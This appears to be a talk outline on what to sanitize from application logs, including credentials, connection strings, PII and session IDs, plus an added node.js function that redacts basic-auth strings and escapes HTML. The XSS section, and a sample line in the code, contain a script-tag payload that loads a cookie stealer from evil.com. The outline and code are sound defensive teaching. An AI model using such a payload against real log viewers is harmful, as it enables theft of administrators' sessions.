- Question that we'll investigate
- "What items should I sanitize from the application logs?"
- More than just passwords :)
- Physical Recon (Reconnaissance)
- Social Engineering: The Art of Human Hacking
- "I can't wait to jump in the dumpster!"
- Rushed employees don't shred documents
- Application Logs
- Application's dumpster
- Common attack target
- Rushed Devs/DevOps engineers don't "shred" sensitive information
- User accidentally enters their password into the username field
- Log view
- "Username ronaldmcdonaldPassword123 doesn't exist"
- "Username ronaldmcdonald logged in successfully"
- Sanitize all usernames from logs?
- No
- Incident Response
- Find trade-off
- Possible solution
- Server-side validation
- If server receives a username with no password
- Abort the request
- Don't query the DB
- Don't log the username
- Log IP for bot/DoS activity
- Client-side validation as well
- Don't send the request
- User's password within a form POST
- Connection strings with basic authentication
- DB connection strings
https://dbUser:[email protected]
- Log View: "Connection to https://dbUser:[email protected] succeeded"
- Fix
- Setup logging middleware that sanitizes basic auth
- Regex: `//:ANYTHING:ANYTHING@`
- Build script output
- Jenkins
- https://wiki.jenkins.io/display/JENKINS/Credentials+Plugin
- Centralized secret management
- Don't use `set -x`
- What is XSS (Cross Site Scripting)?
- Ex: Attacker places malicious javascript in victim's browser
- Steal auth cookie
- How can the logs be an XSS risk?
- Malicious guy signs up for a service with the username of `<script src="evil.com/authCookieStealer.js"></script>`
- Log gets sent to admin UI
- Log View: `Username <script src="evil.com/authCookieStealer.js"></script> logged in`
- Admin views the logs
- Admin's browser interprets the HTML and loads `authCookieStealer.js`
- XSS filter before persisting to logs
- Escape All HTML special characters before logging
- Ex: `<`, `>`, etc.
- xss: node.js module (and CLI tool) that can escape all HTML tags or allow a tag whitelist
- script tag escaping
- Recommendations
- For logs, nothing should be in whitelist
- For auditing, escape instead of removing tags
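As an added example (not part of the talk), here is a small node.js log-sanitizing function that combines the two fixes above: the basic-auth redaction regex for connection strings and HTML escaping of every special character before a line is persisted. The regex, function names and sample log lines are my own assumptions, not the talk's code.

```javascript
// Added example: a log-sanitizing helper in the spirit of the "logging middleware"
// described in the talk. Names, regex and sample lines are assumptions of this example.

// Matches "scheme://user:password@" and keeps only the scheme; the host that follows
// the "@" is untouched. Assumption: the userinfo part contains no "/" or "@"
// (which is how URL userinfo is written), so "https://host:8080/path" is not mangled.
const BASIC_AUTH_IN_URL = /(\b[a-z][a-z0-9+.-]*:\/\/)[^\/\s:@]+:[^\/\s@]*@/gi;

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Redact the user:password portion of any URL found in the line.
function redactBasicAuth(line) {
  return line.replace(BASIC_AUTH_IN_URL, '$1[REDACTED]@');
}

// Escape every HTML special character. For logs nothing is whitelisted,
// so an admin's log viewer can never interpret a logged value as markup.
function escapeHtml(line) {
  return line.replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Sanitize a log line before it is persisted: credentials first, then escaping.
function sanitizeLogLine(line) {
  return escapeHtml(redactBasicAuth(line));
}

// Constructed sample lines mirroring the talk's "Log View" examples.
const SAMPLE_LINES = [
  'Connection to https://dbUser:s3cret@db.internal.example succeeded',
  'Username <script src="evil.com/authCookieStealer.js"></script> logged in',
];

for (const l of SAMPLE_LINES) console.log(sanitizeLogLine(l));
```

Plug `sanitizeLogLine` in at the point where the logger formats its output so every line is sanitized before it reaches disk or the admin UI.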
- SSNs or other personally identifiable information
- Health conditions
- Check compliance
- Logs are often stored unencrypted, which could violate HIPAA
- Auth Cookies
- Certain frameworks will automatically put session IDs (auth information) in URL parameters if cookies are turned off
- Session Tracking
- Hash session
- nginx considerations
- Talk to DevOps
- https://www.owasp.org/index.php/Logging_Cheat_Sheet
- https://www.owasp.org/index.php/OWASP_Security_Logging_Project